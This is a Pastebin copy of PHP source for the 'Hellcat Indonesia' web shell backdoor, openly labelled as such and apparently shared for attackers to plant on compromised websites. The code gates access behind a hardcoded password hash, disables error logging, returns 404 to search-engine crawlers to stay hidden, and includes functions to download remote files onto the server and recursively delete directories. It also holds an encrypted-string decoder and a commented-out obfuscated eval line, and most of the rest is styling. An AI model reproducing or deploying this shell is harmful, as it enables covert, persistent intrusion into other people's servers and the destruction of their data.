EddieKidiw

HellCat Indonesia

Apr 2nd, 2020
751
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
PHP 92.79 KB | None | 0 0
  1. <?php
  2. //-- Coded by Bartes Dwiky --//
  3. //-- Premium Script Hellcat Shell Backdoor --//
  4. //-- http://hellcatindonesia.net --//
  5.  
  6. //------------------[ readme ] ------------------//
  7. // In accordance with the provisions and services ... we hope you enjoy this script, we have not made this script fully for paid members, for updates you will make a notification later ... Thanks! //
  8.  
  9.  
  10. error_reporting(0);
  11. ob_start("ob_gzhandler");
  12. //-- FITUR RUBAH PASSWORD ADA DI DALAM SHELL --//
  13. //$pass = "9c4a382e85f9492ce86d8fa71ee5c581"; // lol
  14. $pass = "63a9f0ea7bb98050796b649e85481845"; // root
  15. $_POST = cl($_POST);
  16. $_GET = cl($_GET);
  17. $_COOKIE = cl($_COOKIE);
  18. $_COEG = array_merge($_POST, $_GET);
  19. $_COEG = array_map("xp", $_COEG);
  20. $cookie = md5($_SERVER['HTTP_USER_AGENT']);
  21. if(!isset($_COOKIE['HELLCAT'])) {
  22. vb('HELLCAT', $cookie);
  23. }
  24. function vb($k, $v) {
  25.     $_COOKIE[$k] = $v;
  26.     setcookie($k, $v);
  27. }
  28. function mtr($y) {
  29.     vars('<meta http-equiv="refresh" content="1;url='.$y.'"/>');
  30.     return $y;
  31. }
  32. function op($d, $e) {
  33.     $fp = fopen($d, "w");
  34.     $ch = curl_init();
  35.           curl_setopt($ch, CURLOPT_URL, $e);
  36.           curl_setopt($ch, CURLOPT_BINARYTRANSFER, true);
  37.           curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
  38.           curl_setopt($ch, CURLOPT_SSL_VERIFYhellcatR, false);
  39.           curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);
  40.           curl_setopt($ch, CURLOPT_FILE, $fp);
  41.     return curl_exec($ch);
  42.           curl_close($ch);
  43.     fclose($fp);
  44.     ob_flush();
  45.     flush();
  46. }
  47. function deledir($dirname) {
  48.          if (is_dir($dirname))
  49.            $dir_handle = opendir($dirname);
  50.      if (!$dir_handle)
  51.           return false;
  52.      while($file = readdir($dir_handle)) {
  53.            if ($file != "." && $file != "..") {
  54.                 if (!is_dir($dirname."/".$file))
  55.                      unlink($dirname."/".$file);
  56.                 else
  57.                      deledir($dirname.'/'.$file);
  58.            }
  59.      }
  60.      closedir($dir_handle);
  61.      rmdir($dirname);
  62.      return true;
  63. }
  64. function a($x17) {
  65. @define("x13", "\x31\x33\x33\x37", true);
  66. $x14 = base64_decode($x17);
  67. $x16s = substr($x14, 0, mcrypt_get_iv_size(MCRYPT_RIJNDAEL_128, MCRYPT_MODE_CBC));
  68. $x19 = rtrim(
  69.     mcrypt_decrypt(
  70.         MCRYPT_RIJNDAEL_128,
  71.         hash('sha256', x13, true),
  72.         substr($x14, mcrypt_get_iv_size(MCRYPT_RIJNDAEL_128, MCRYPT_MODE_CBC)), MCRYPT_MODE_CBC, $x16s), "\0");
  73. return $x19;
  74. }
  75. function x($b) {
  76.     $c = a($b);
  77. return $c;
  78. }
  79. function vars($x) {
  80.     echo $x;
  81. }
  82. @ini_set('error_log',NULL);
  83. @ini_set('log_errors',0);
  84. @ini_set('html_errors',0);
  85. @ini_set('max_execution_time',0);
  86. @ini_set('file_uploads',1);
  87. @set_time_limit(0);
  88. @clearstatcache();
  89. @define("x4", "https://www.hellcatindonesia.net", true);
  90. @define("x5", "\x64\x69\x72\x3d", true);
  91. @define("x7", "\x63\x6f\x6d\x6d\x61\x6e\x64\x3d", true);
  92. @define("x6", "\x66\x69\x6c\x65\x3d", true);
  93. @define("sec", $pass, true);
  94. if(isset($_COEG['dir'])) {
  95.         $dir = str_replace("\\", "/", $_COEG['dir']);
  96.         @chdir($dir);
  97.     } else {
  98.         $dir = str_replace("\\", "/", getcwd());
  99. }
  100. $dir = str_replace("\\","/", $dir);
  101. $scdir = explode("/", $dir);        
  102. function cl($arr){
  103.     $quotes_sybase = strtolower(ini_get('magic_quotes_sybase'));
  104. if(function_exists('get_magic_quotes_gpc') && get_magic_quotes_gpc()){
  105.         if(is_array($arr)){
  106.             foreach($arr as $k=>$v){
  107.                 if(is_array($v)) $arr[$k] = cl($v);
  108.                 else $arr[$k] = (empty($quotes_sybase) || $quotes_sybase === 'off')? stripslashes($v) : stripslashes(str_replace("\'\'", "\'", $v));
  109.             }
  110.         }
  111.     }
  112.     return $arr;
  113. }
  114. function xp($str){
  115.     return (is_array($str))? array_map("rawurldecode", $str):rawurldecode($str);
  116. }
  117. function r($r) {
  118.     vars('<script>window.location = "'.$r.'";</script>');
  119.     return $r;
  120. }
  121. function s($s) {
  122.     echo 'notif({
  123.                 type: "default",
  124.                 msg: "<span class=\'alert\'><font color=\'#fff\'>'.$s.'</font>",
  125.                 width: "all",
  126.                 height: 100,
  127.                 position: "center",
  128.             });';
  129.     return $s;
  130. }
  131. function error($text) {
  132. echo '<script> notif({
  133.                 type: "default",
  134.                 msg: "<span class=\'alert\'><font color=\'#fff\'>'.$text.'</font>",
  135.                 width: "all",
  136.                 height: 100,
  137.                 position: "center",
  138.             });</script>';
  139. return $text;
  140. }
  141. function success($text) {
  142. echo '<script> notif({
  143.                 type: "default",
  144.                 msg: "<span class=\'alert\'><font color=\'#fff\'>'.$text.'</font>",
  145.                 width: "all",
  146.                 height: 100,
  147.                 position: "center",
  148.             });</script>';
  149. return $text;
  150. }
  151. if(get_magic_quotes_gpc()) {
  152.     function stripslashes_array($array) {
  153.         return is_array($array) ? array_map('stripslashes_array', $array) : stripslashes($array);
  154. }
  155.     $_COEG = stripslashes_array($_COEG);
  156.     $_COOKIE = stripslashes_array($_COOKIE);
  157. }
  158. if(!empty(sec)) {
  159.     if(isset($_COEG['pass']) && (md5($_COEG['pass']) == sec))         vb('HELLCAT', sec);
  160. if(!isset($_COOKIE['HELLCAT']) || ($_COOKIE['HELLCAT'] != sec))
  161.         login();
  162. }
  163. function login() {
  164. if(!empty($_SERVER['HTTP_USER_AGENT'])) {
  165.         $userAgents = array("Google", "Slurp", "MSNBot", "ia_archiver", "Yandex", "Rambler");
  166.           if(preg_match('/' . implode('|', $userAgents) . '/i', $_SERVER['HTTP_USER_AGENT'])) {
  167.           header('HTTP/1.0 404 Not Found');
  168.           exit;
  169.      }
  170.       }
  171. //eval(str_rot13(gzinflate(str_rot13(base64_decode("RikuqywqKVdKsEgAseKBzPiCpMT0osT0NA2l0vT0cSt9/TLd3KTEIr2CJL2yUf3SosrKgrxn/cqkkrJR3TQQN9NVLz07XVbTmpersKxVUFYFdyhDBAA=")))));
  172. ?>
  173.  
  174. <!DOCTYPE html><html><head>
  175. <title>HellCat Indonesia - <?php echo $_SERVER["REMOTE_ADDR"]; ?>
  176. <?php
  177. die('</title> <meta name="robots" content="noindex, nofollow, noarchive"> <meta name="viewport" content="width=device-width, initial-scale=1">
  178. <meta property="og:type" content="article">
  179. <meta name="description" content="version 1.0.">
  180. <link rel="icon" type="https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcTJVGle-arAu0pdnTeY--royJcpsVLhzyEj_RYJGnRkolUzkNrg7DzyamtiVn1LMBtnG9o5Xw&usqp=CAE&s">
  181. <meta property="og:title" content="Hellcat Indonesia Shell Backdoor!">
  182. <meta property="og:description" content="version 1.0."/>
  183. <meta property="og:image" content="https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcTJVGle-arAu0pdnTeY--royJcpsVLhzyEj_RYJGnRkolUzkNrg7DzyamtiVn1LMBtnG9o5Xw&usqp=CAE&s">
  184. <meta property="og:image:type" content="image/jpeg"/>
  185. <meta property="og:image:width" content="300" />
  186. <meta property="og:image:height" content="300" />
  187. <meta property="fb:app_id" content="1784293148453056" />
  188. <link href="http://aashirwadtravel.com/favicon.ico" rel="icon" type="image/x-icon"/>
  189. <meta name="theme-color" content="#222"><meta name="apple-mobile-web-app-capable" content="yes">
  190. <meta name="apple-mobile-web-app-status-bar-style" content="#222"><meta name="msapplication-navbutton-color" content="#222"><meta name="author" content="Hellcat Indonesia">
  191. <link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/font-awesome/4.7.0/css/font-awesome.min.css"/>
  192. <style>
  193. @import url("https://fonts.googleapis.com/css?family=Cabin");
  194. *{
  195.     box-sizing: border-box;
  196. }
  197. *:focus {
  198.    outline: 0;
  199. }
  200. body {
  201.         font-size: 14px;
  202.         color:#fff;
  203.         margin:auto;
  204.         font-family: "Cabin";
  205.         background:#191919;
  206.        text-shadow:0px 0px 0px #343436;
  207. }
  208. .btn-exe {
  209.     background:#343436;
  210.     color:#fff;
  211.     font-family: "Cabin";
  212.     padding:6px;
  213.     border:1px solid #343436;
  214.     width:100%;
  215.     font-size:13px;
  216. }
  217. .login-container {
  218.     max-width: 450px;
  219.     margin: auto;
  220.     overflow: auto;
  221.    background:none;
  222. }
  223. .login-kepala {
  224.     background:#262624;
  225.     padding:10px;
  226.     color:#fff;
  227.     font-size:17px;
  228.     position:fixed;z-index:1024;top:0;left:0;right:0;
  229.     box-shadow:0px 0px 3px #111;
  230.     font-family: "Cabin";
  231. }
  232. input[type=password] {
  233.     border:1px solid #343436;
  234.     padding:8px;
  235.     background: #1D1D1D;
  236.     color:#fff;
  237.     font-family: "Cabin";
  238.     width:100%;
  239.     font-size:14px;
  240. }
  241. .btn-exe:hover {
  242.     background:none;
  243.     border:1px solid #343436;
  244.     -webkit-transition: all 0.3s;
  245.   -moz-transition: all 0.3s;
  246.    transition: all 0.3s;
  247. }
  248. table {
  249.     width: 100%;
  250. }
  251. @media screen and (max-width: 1024px) {
  252. .btn-exe {
  253.     background:#343436;
  254.     color:#fff;
  255.     font-family: "Cabin";
  256.     padding:7px;
  257.     border:1px solid #343436;
  258.     width:100%;
  259.     font-size:13px;
  260.    }  
  261. }
  262. @media screen and (max-width: 780px) {
  263. .btn-exe {
  264.     background:#343436;
  265.     color:#fff;
  266.     font-family: "Cabin";
  267.     padding:7px;
  268.     border:1px solid #343436;
  269.     width:100%;
  270.     font-size:14px;
  271.   }
  272. }
  273. .posisi{
  274.     position: relative;
  275.     top: 100px;
  276.     }
  277. </style>
  278. </head>
  279.  
  280. <body><div class="login-kepala">
  281. <div class="login-container"><form action="" method="post"><table><td align="center" style="width:10%"><i class="fa fa-terminal"></i></td><td style="width:70%"><input type="password" name="pass" placeholder="Please enter your password" style="padding:7px"> </td><td style="text-align:right;width:20%"><button onmousedown="bleep.play();" type="submit" class="btn-exe"><i class="fa fa-sign-in"></i></button></td></table></form></div></div>
  282.  
  283. </div>
  284. </body></html>
  285. ');
  286. }
  287. ?>
  288.    
  289.  
  290. <!DOCTYPE HTML>
  291. <html lang="id">
  292. <head><title>HellCat Indonesia - <?php echo $_SERVER["REMOTE_ADDR"]; ?></title>
  293. <script>
  294. var bleep = new Audio();
  295. bleep.src = 'https://s.cdpn.io/217233/buttonHoverScary.wav';
  296. </script>
  297. <?php
  298. vars('
  299. <meta name="viewport" content="width=device-width, initial-scale=1, user-scalable=no">
  300. <meta property="og:type" content="article">
  301. <meta name="description" content="version 1.3">
  302. <link rel="icon" type="https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcTJVGle-arAu0pdnTeY--royJcpsVLhzyEj_RYJGnRkolUzkNrg7DzyamtiVn1LMBtnG9o5Xw&usqp=CAE&s">
  303. <meta property="og:title" content="Hellcat Indonesia Shell Backdoor!">
  304. <meta property="og:description" content="version 1.0."/>
  305. <meta property="og:image" content="https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcTJVGle-arAu0pdnTeY--royJcpsVLhzyEj_RYJGnRkolUzkNrg7DzyamtiVn1LMBtnG9o5Xw&usqp=CAE&s">
  306. <meta property="og:image:type" content="image/jpeg"/>
  307. <meta property="og:image:width" content="300" />
  308. <meta property="og:image:height" content="300" />
  309. <meta property="fb:app_id" content="1784293148453056" />
  310. <link href="http://aashirwadtravel.com/favicon.ico" rel="icon" type="image/x-icon"/>
  311.     <meta name="theme-color" content="#222">
  312.     <meta name="apple-mobile-web-app-capable" content="yes">
  313.     <meta name="apple-mobile-web-app-status-bar-style" content="#222">
  314.     <meta name="msapplication-navbutton-color" content="#222">
  315.     <meta name="author" content="HellCat Indonesia">
  316.    
  317. <style>
  318. @import url("https://fonts.googleapis.com/css?family=Cabin");
  319. *{
  320.     box-sizing: border-box;
  321. }
  322. *:focus {
  323.    outline: 0;
  324. }
  325. body {
  326.         font-size: 14px;
  327.         color:#fff;
  328.         margin:auto;
  329.         font-family: "Cabin";
  330.         background:#191919;
  331.        text-shadow:0px 0px 0px #343436;
  332. }
  333. ::selection {
  334.    background-color: rgba(201,223,255,0.2);
  335.    color: #ffffff;
  336. }
  337. ::-moz-selection {
  338.    background-color: rgba(201,223,255,0.1);
  339.    color: #ffffff;
  340. }
  341. hr {
  342.     border: 0;
  343.     height: 1px;
  344.     background-image: -webkit-linear-gradient(left, #343436, #343436, #343436);
  345.     background-image: -moz-linear-gradient(left, #343436, #343436, #343436);
  346.     background-image: -ms-linear-gradient(left, #343436, #343436, #343436);
  347.     background-image: -o-linear-gradient(left, #343436, #343436, #343436);
  348. }
  349. code {
  350.     font-family: "Cabin";
  351.     word-wrap: break-word;
  352.     background:none;
  353. }
  354. pre {
  355.     margin:0px;
  356.     border:1px solid #343436;
  357.     white-space: pre-wrap;
  358.    white-space: -moz-pre-wrap;
  359.    white-space: -pre-wrap;
  360.    white-space: -o-pre-wrap;
  361.    word-wrap: break-word;  
  362. }
  363. .co {
  364.    margin:auto;
  365.    max-width:300px;
  366. }
  367. .a:hover {
  368.     color:#1D9D73;
  369.     -webkit-transition: all 0.3s;
  370.   -moz-transition: all 0.3s;
  371.    transition: all 0.3s;
  372. }
  373. .mainc {
  374.     color: #1D9D73;
  375. }
  376. .coL-option {
  377.     padding:5px;
  378.     border:1px solid #343436;
  379.     margin-top:5px;
  380.     background:none;
  381. }
  382. .coL-btn-option-active {
  383.     padding:5px;
  384.     background: #343436;
  385.     border:1px solid #343436;
  386.     font-size:16px;
  387.     font-family: "Cabin";
  388.     width:100%;
  389.     color:#fff;
  390. }
  391. .coL-btn-option {
  392.     padding:5px;
  393.     background: none;
  394.     border:1px solid #343436;
  395.     font-size:16px;
  396.     font-family: "Cabin";
  397.     width:100%;
  398.     color:#fff;
  399. }
  400. .coL-btn-option:hover {
  401.     background: #343436;
  402.     width:100%;
  403.     -webkit-transition: all 0.3s;
  404.   -moz-transition: all 0.3s;
  405.    transition: all 0.3s;
  406. }
  407. .coL-option-panel {
  408.     padding:5px;
  409.     border:none;
  410.     background:#343436;
  411. }
  412. th {
  413.     font-weight: normal;
  414.     font-size: 15px;
  415. }
  416. .btn-exe {
  417.     background:#343436;
  418.     color:#fff;
  419.     font-family: "Cabin";
  420.     padding:6px;
  421.     border:1px solid #343436;
  422.     width:100%;
  423.     font-size:13px;
  424. }
  425. textarea {
  426.     border: 1px solid #343436;
  427.     width: 100%;
  428.     height: 487px;
  429.     padding: 5px;
  430.     background: #1D1D1D;
  431.     color: #ffffff;
  432.     font-family: "Cabin";
  433.    font-size: 13px;
  434. }
  435. select {
  436.    cursor:pointer;
  437.     padding:6px;
  438.     border:1px solid #343436;
  439.     font-family: "Cabin";
  440.     font-size:14px;
  441.     background: #1D1D1D;
  442.     width:100%;
  443.    color: #fff;
  444.    -webkit-transition: all 0.5s;
  445.    -moz-transition: all 0.5s;
  446.     transition: all 0.5s;
  447. }
  448. .php {
  449.     font-size: 13px;
  450. }
  451. .td-md5 {
  452.     border-right:1px solid #1D9D73;
  453.     padding:6px;
  454. }
  455. .login-container {
  456.     max-width: 450px;
  457.     margin: auto;
  458.     overflow: hidden;
  459.    background:none;
  460. }
  461. .login-kepala {
  462.     background:#262624;
  463.     padding:10px;
  464.     color:#fff;
  465.     font-size:17px;
  466.     position:fixed;z-index:1024;top:0;left:0;right:0;
  467.     box-shadow:0px 0px 3px #111;
  468.     font-family: "Cabin";
  469. }
  470. .dir {
  471.     background:#1D1D1D;
  472.     padding:2px;
  473.     margin-left:2px;
  474.     margin-right:2px;
  475.     margin-top:3px;
  476.     margin-bottom:1px;
  477. }
  478. .dir-pallet {
  479.     background:#343436;
  480.     padding:6px;
  481.     text-align:left;
  482. }
  483. .dir-td-left {
  484.     width:50px;
  485.     border-right:1px solid #1D9D73;
  486.     font-size: 14px;
  487. }
  488. .dir-td-right {
  489.     padding-left:5px;
  490.     font-size: 15px;
  491. }
  492. .tools-content {
  493.     padding:3px;
  494.     margin-top:5px;
  495.     background:none;
  496.     border:1px solid #343436;
  497. }
  498. .td-tools-left {
  499.     padding:7px;
  500.     width:30px;
  501.     text-align:center;
  502. }
  503. .td-tools-icon {
  504.     width:50px;
  505.     background:none;
  506.     text-align:center;
  507. }
  508. .td-tools-content {
  509.     padding-left:5px;
  510. }
  511. .ex-hov:hover {
  512.     background:rgba(52, 52, 54, 0.3);
  513.     -webkit-transition: all 0.3s;
  514.   -moz-transition: all 0.3s;
  515.    transition: all 0.3s;
  516. }
  517. .kepala {
  518.     background:#343436;
  519.     padding:7px;
  520.     color:#fff;
  521.     font-size:15px;
  522.     position:fixed;z-index:1024;top:0;left:0;right:0;
  523.     box-shadow:0px 0px 3px #111;
  524.     font-family: "Cabin";
  525. }
  526. .co-ontainer {
  527.     max-width: 820px;
  528.     margin: auto;
  529.     overflow: hidden;
  530.    background:none;
  531. }
  532. .co-ontainer-2 {
  533.     max-width: 820px;
  534.     margin: auto;
  535.     overflow: hidden;
  536.    background:#232326;
  537.    margin-top:50px;
  538. }
  539. table {
  540.     width:100%;
  541. }
  542. .td-panel {
  543.     background: #343436;
  544.     padding:5px;
  545.     width:40px;
  546.     text-align:center;
  547. }
  548. .td-panel-right {
  549.     padding-left:3px;
  550.     font-size: 14px;
  551. }
  552. .wrap {
  553.     word-wrap: break-word;  
  554. }
  555. .break {
  556.     word-break: break-all;
  557.    white-space: normal;
  558. }
  559. .btn-dark:hover {
  560.     color:#4B81AA;
  561.     }
  562. .coL-panel {
  563.     padding:1px;
  564.     border:1px solid #343436;
  565.     color:#fff;
  566.     background:none;
  567. }
  568. .coR-panel {
  569.     padding:1px;
  570.     border:1px solid #343436;
  571.     color:#fff;
  572.     background:none;
  573. }
  574. .footer {
  575.     background:#343436;
  576.     color:#fff;
  577.     padding:8px;
  578.     text-align:center;
  579.     margin-top:2px;
  580. }
  581. .btn-nav {
  582.    background:rgba(0,0,0,0.3);
  583.    padding:6px;
  584.    color:#fff;
  585.     font-size:14px;
  586.     font-family: "Cabin";
  587.     width:100%;
  588.     border:none;
  589.     font-weight:normal;
  590. }
  591. .btn-nav:hover {
  592.     background:#343436;
  593.     -webkit-transition: all 0.3s;
  594.   -moz-transition: all 0.3s;
  595.    transition: all 0.3s;
  596. }
  597. .table-info {
  598.     margin-top:3px;
  599.     border-collapse:collapse;
  600.     font-family: "Cabin";
  601. }
  602. .th-info {
  603.     padding:6px;
  604.     border:1px solid #343436;
  605.     background:#343436;
  606.     border-collapse:collapse;
  607.     font-family: "Cabin";
  608. }
  609. .td-info {
  610.     padding:7px;
  611.     border:1px solid #343436;
  612.     background:none;
  613.     border-collapse:collapse;
  614.     font-family: "Cabin";
  615. }
  616. .table-file {
  617.     margin-top:3px;
  618.     border-collapse:collapse;
  619.     font-family: "Cabin";
  620. }
  621. .th-file {
  622.     padding:6px;
  623.     border:1px solid #343436;
  624.     background:#343436;
  625.     border-collapse:collapse;
  626.     font-family: "Cabin";
  627. }
  628. .td-file {
  629.     padding:4px;
  630.     border:1px solid #343436;
  631.     background:none;
  632.     border-collapse:collapse;
  633.     font-family: "Cabin";
  634. }
  635. .label-danger {
  636.     color:#FF0000;
  637. }
  638. .label-default {
  639.     color:#1D9D73;
  640. }
  641. .label-success {
  642.     color:#1D9D73;
  643. }
  644. .top {
  645.     margin-top:5px;
  646. }
  647. input[type=text] {
  648.     border:1px solid #343436;
  649.     padding:7px;
  650.     background: #1D1D1D;
  651.     color:#fff;
  652.     font-family: "Cabin";
  653.     width:100%;
  654.     font-size:14px;
  655. }
  656. input[type=password] {
  657.     border:1px solid #343436;
  658.     padding:8px;
  659.     background: #1D1D1D;
  660.     color:#fff;
  661.     font-family: "Cabin";
  662.     width:100%;
  663.     font-size:14px;
  664. }
  665. input[type=file] {
  666.     border:1px solid #343436;
  667.     color:trasparent;
  668.     background: #1D1D1D;
  669.     width:100%;
  670.     font-size:12px;
  671.     padding:4px;
  672.     font-family: "Cabin";
  673. }
  674. .alert {
  675.     font-family: "Cabin";
  676. }
  677. .btn-exe:hover {
  678.     background:none;
  679.     border:1px solid #343436;
  680.     -webkit-transition: all 0.3s;
  681.   -moz-transition: all 0.3s;
  682.    transition: all 0.3s;
  683. }
  684. .nav {
  685.     background: #303030;
  686.     color:#fff;
  687.     width:30px;
  688.     height:30px;
  689.     padding:5px;
  690.     border:none;
  691.     border-radius:100%;
  692.     box-shadow: 2px 2px 2px rgba(0,0,0,0.3) inset;
  693. }
  694. .nav:hover {
  695.   background: #1D9D73;
  696.  transition: all 0.5s ease-in-out;
  697.  color: #fff;
  698. }
  699. /* Main */
  700.  
  701.     background-size:100% 125%;
  702.     padding-top:250px;
  703.     padding-bottom:5px;
  704.     padding-left:5px;
  705.     padding-right:5px;
  706.     border:0px solid #1D1D1D;
  707. }
  708.     .coL {
  709.         width: 469px;
  710.         border: 0px solid #343436;
  711.         background: #1D1D1D;
  712.         padding: 5px;
  713.         float: left;
  714.        margin-left:2px;
  715.         margin-right:2px;
  716.         margin-bottom:2px;
  717.         margin-top:3px;
  718.        color:white;
  719.     }
  720.     .coR {
  721.         width: 343px;
  722.         border: 0px solid #343436;
  723.         background: #1D1D1D;
  724.         margin-left:2px;
  725.         margin-right:2px;
  726.         margin-bottom:2px;
  727.         margin-top:3px;
  728.        padding: 5px;
  729.         float: left;
  730.     }
  731. a {
  732.     text-decoration:none;
  733.     color:#fff;
  734. }
  735. .cookie-td {
  736.     width: 150px;
  737. }
  738.  
  739. @media screen and (max-width: 1024px) {
  740.    
  741.     .co-ontainer-2 {
  742.         width: 100%;
  743.     }
  744.     .coL {
  745.         width: 467px;
  746.         background: none:
  747.        border: none;
  748.        margin-bottom:3px;
  749.     }
  750.     .coR {
  751.         width: 42%;
  752.         float: right;
  753.     }
  754.     .cookie-td {
  755.         width: 150px;
  756.     }
  757.    .btn-exe {
  758.     background:#343436;
  759.     color:#fff;
  760.     font-family: "Cabin";
  761.     padding:7px;
  762.     border:1px solid #343436;
  763.     width:100%;
  764.     font-size:13px;
  765.    }  
  766.    input[type=file] {
  767.        border:1px solid #343436;
  768.        color:trasparent;
  769.        background: #1D1D1D;
  770.        width:100%;
  771.        font-size:12px;
  772.        padding:4px;
  773.        font-family: "Cabin";
  774.    }
  775. }
  776. @media screen and (max-width: 780px) {
  777.    
  778.    
  779.     background-size:100% 100%;
  780.     padding-top:160px;
  781.     padding-bottom:5px;
  782.     padding-left:5px;
  783.     padding-right:5px;
  784.     margin:3px;
  785. }
  786.     .coL {
  787.         width: auto;
  788.         float: none;
  789.     }
  790.     .coR {
  791.         width: auto;
  792.         float: none;
  793.     }
  794.     .cookie-td {
  795.         width: 100px;
  796.     }
  797.    .btn-exe {
  798.     background:#343436;
  799.     color:#fff;
  800.     font-family: "Cabin";
  801.     padding:7px;
  802.     border:1px solid #343436;
  803.     width:100%;
  804.     font-size:14px;
  805.   }
  806.   input[type=file] {
  807.     border:1px solid #343436;
  808.     color:trasparent;
  809.     background: #1D1D1D;
  810.     width:100%;
  811.     font-size:12px;
  812.     padding:6px;
  813.     font-family: "Cabin";
  814. }
  815. }
  816.     .hljs{display:block;overflow-x:auto;padding:0.5em;background:#1D1D1D;color:#e6e1dc}
  817.     .hljs-comment,.hljs-quote{color:#bc9458;font-style:italic}
  818.     .hljs-keyword,.hljs-selector-tag{color:#c26230}
  819.     .hljs-string,.hljs-number,.hljs-regexp,.hljs-variable,.hljs-template-variable{color:#a5c261}
  820.     .hljs-subst{color:#519f50}.hljs-tag,.hljs-name{color:#e8bf6a}
  821.     .hljs-type{color:#da4939}
  822.     .hljs-symbol,.hljs-bullet,.hljs-built_in,.hljs-builtin-name,.hljs-attr,.hljs-link{color:#6d9cbe}
  823.     .hljs-params{color:#d0d0ff}
  824.     .hljs-attribute{color:#cda869}
  825.     .hljs-meta{color:#9b859d}
  826.     .hljs-title,.hljs-section{color:#ffc66d}
  827.     .hljs-addition{background-color:#144212;color:#e6e1dc;display:inline-block;width:100%}
  828.     .hljs-deletion{background-color:#600;color:#e6e1dc;display:inline-block;width:100%}
  829.     .hljs-selector-class{color:#9b703f}
  830.     .hljs-selector-id{color:#8b98ab}
  831.     .hljs-emphasis{font-style:italic}
  832.     .hljs-strong{font-weight:bold}
  833.     .hljs-link{text-decoration:underline}
  834.     #ui_notifIt{
  835.         position: fixed;
  836.         top: 10px;
  837.         right: 10px;
  838.         left:10px;
  839.         cursor: pointer;
  840.         overflow: hidden;
  841.         -webkit-box-shadow: 0px 3px 5px rgba(0, 0, 0, 0.3);
  842.         -moz-box-shadow: 0px 3px 5px rgba(0, 0, 0, 0.3);
  843.         -o-box-shadow: 0px 3px 5px rgba(0, 0, 0, 0.3);
  844.         box-shadow: 0px 3px 5px rgba(0, 0, 0, 0.3);
  845.         -wekbit-border-radius: 5px;
  846.         -moz-border-radius: 5px;
  847.         -o-border-radius: 5px;
  848.         border-radius: 5px;
  849.         z-index: 2000;
  850.     }
  851.     #ui_notifIt:hover{
  852.         opacity: 1 !important;
  853.     }
  854.     #ui_notifIt p{
  855.         text-align: center;
  856.         font-family: sans-serif;
  857.         font-size: 14px;
  858.         padding: 0;
  859.         margin: 0;
  860.     }
  861.     #notifIt_close{
  862.         position: absolute;
  863.         color: #FFF;
  864.         top: 0;
  865.         padding: 0px 5px;
  866.         right: 0;
  867.     }
  868.     #notifIt_close:hover {
  869.         background-color: rgba(255, 255, 255, 0.3);
  870.     }  
  871.     #ui_notifIt.default{
  872.         background: #242424;
  873.         border:0px solid #091835;
  874.         box-shadow:0px 2px 4px rgba(0,0,0,0.4);
  875.     }
  876.    
  877.     /* notifit confirm */
  878.     .notifit_confirm_bg,
  879.     .notifit_prompt_bg{
  880.         position: fixed;
  881.         top: 0;
  882.         left: 0;
  883.         height: 100%;
  884.         width: 100%;
  885.         background-color: rgba(255, 255, 255, 0.1);
  886.     }
  887.     .notifit_confirm *,
  888.     .notifit_prompt *{
  889.         font-family: sans-serif;
  890.     }
  891.     .notifit_confirm,
  892.     .notifit_prompt{
  893.         position: fixed;
  894.         top: 0;
  895.         left: 0;
  896.         padding: 30px 30px 0px 30px;
  897.         background-color: #eee;
  898.         border: 1px solid rgba(0, 0, 0, 0.1);
  899.         -webkit-border-radius: 5px;
  900.         -moz-border-radius: 5px;
  901.         -ms-border-radius: 5px;
  902.         -o-border-radius: 5px;
  903.         border-radius: 5px;
  904.         -webkit-box-shadow: 0px 2px 10px rgba(0, 0, 0, 0.2);
  905.         box-shadow: 0px 2px 10px rgba(0, 0, 0, 0.2);
  906.    }
  907. option {
  908.    -webkit-transition: all 0.5s;
  909.    -moz-transition: all 0.5s;
  910.     transition: all 0.5s;
  911. }
  912. .move-top {
  913.    position: fixed;
  914.    bottom: 10px;
  915.    right: 10px;
  916.    text-decoration: none;
  917.    padding: 10px;
  918.    display: none;
  919.    cursor:pointer;
  920.    background:rgba(0, 0, 0, 0.2);
  921.    border-radius:5px;
  922. } </style>
  923. <link rel="icon" href="/image/favicon.ico" type="image/x-icon" />
  924. <script>
  925.    baseUrl = window.location.href.split("?")[0];
  926.    window.history.pushState("name", "?", baseUrl);
  927.    function c(x) {
  928.         window.location = x
  929.   }
  930. </script>
  931.     <link rel="stylesheet" href="//maxcdn.bootstrapcdn.com/font-awesome/4.7.0/css/font-awesome.min.css"/>
  932.     <script src="//cdnjs.cloudflare.com/ajax/libs/jquery/3.2.1/jquery.js"></script>
  933.     <script src="//cdnjs.cloudflare.com/ajax/libs/highlight.js/9.12.0/highlight.min.js"></script>
  934.    <script src="'.x4.'alert.js"></script>
  935. <style>
  936. .move-top {
  937.    position: fixed;
  938.    bottom: 10px;
  939.    right: 10px;
  940.    text-decoration: none;
  941.    padding: 10px;
  942.    display: none;
  943.    cursor:pointer;
  944.    background:rgba(0, 0, 0, 0.2);
  945.    border-radius:5px;
  946. }</style>
  947. <i class="fa fa-chevron-up move-top"></i>
  948. <script>
  949. jQuery(document).ready(function() {
  950.    var offset = 220;
  951.    var duration = 500;
  952.    jQuery(window).scroll(function() {
  953.        if (jQuery(this).scrollTop() > offset) {
  954.            jQuery(\'.move-top\').fadeIn(duration);
  955.        } else {
  956.            jQuery(\'.move-top\').fadeOut(duration);
  957.        }
  958.    });
  959.    jQuery(\'.move-top\').click(function(event) {
  960.        event.preventDefault();
  961.        jQuery(\'html, body\').animate({scrollTop: 0}, duration);
  962.        return false;
  963.    })
  964. });
  965. </script>
  966. <script>hljs.initHighlightingOnLoad();</script></head><div class="kepala"><div class="co-ontainer">
  967. <table><td style="width:25px">
  968. <b><i class="fa fa-superpowers"></i></b></td><td>HELLCAT INDONESIA</td><td style="text-align:right;width:100px">
  969. <button onmousedown="bleep.play();" class="nav" onclick=\'c("'.$_SERVER['PHP_SELF'].'")\'><i class="fa fa-home"></i></button>
  970. <button onmousedown="bleep.play();" class="nav" onclick=\'c("?'.x5.getcwd().'&'.x7.'about")\'><i class="fa fa-question"></i></button>
  971. <button onmousedown="bleep.play();" class="nav" onclick=\'c("?'.x5.getcwd().'&'.x7.'logout")\'><i class="fa fa-power-off"></i></button></td></table></div></div>
  972.  
  973. <div class="co-ontainer-2">
  974. <div class="cover"></div>            
  975. <div class="dir">
